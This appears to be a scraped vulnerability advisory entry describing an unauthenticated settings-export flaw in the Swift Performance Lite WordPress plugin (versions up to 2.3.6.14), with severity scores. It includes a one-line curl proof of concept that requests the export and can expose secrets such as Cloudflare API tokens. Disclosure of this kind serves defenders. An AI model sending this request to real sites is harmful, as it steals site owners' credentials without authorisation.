Lucene search

K
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:8C83DD57-9291-4DFC-846D-5AD47534E2AD
HistoryNov 27, 2023 - 12:00 a.m.

Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export

2023-11-2700:00:00
Krzysztof Zając (CERT PL)
wpscan.com
6
wordpress
plugin
unauthenticated
configuration
export
sensitive information
cloudflare api

8.5 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

Description The plugin does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens.

PoC

curl --url ‘http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export

CPENameOperatorVersion
eq2.3.6.15

8.5 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

14.0%

Related for WPVDB-ID:8C83DD57-9291-4DFC-846D-5AD47534E2AD